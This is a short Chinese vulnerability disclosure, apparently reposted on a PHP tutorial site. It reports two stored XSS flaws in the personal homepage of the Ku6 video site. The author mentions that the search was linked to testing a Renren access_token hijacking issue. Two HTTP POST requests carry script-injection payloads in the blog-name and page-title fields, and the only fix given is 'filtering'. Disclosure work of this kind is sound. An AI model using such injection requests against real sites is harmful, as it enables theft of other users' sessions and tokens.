酷6网个人主页两个XSS - 网站安全 - 自学php

个人主页，存在XSS的地方挺多的。 PS：其实找这个是因为要测试人人网的access_token劫持漏洞。详细说明：1、主页标题处存在 POST /user.htm?t=update HTTP/1.1 ………… Host: zone.ku6测试数据 Cookie: ………… format=json&uid=17958620&blogname=hi<script>alert(1)</script> 2、添加页面 POST /tab.htm?t=update HTTP/1.1 ………… Host: zone.ku6测试数据 Cookie: …… id=41924336&title=b<script>alert(document.location.hash)</script> 漏洞证明：修复方案：过滤，好多地方都有作者PiaCa

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did13153

更新时间：2022-09-13 阅读：43次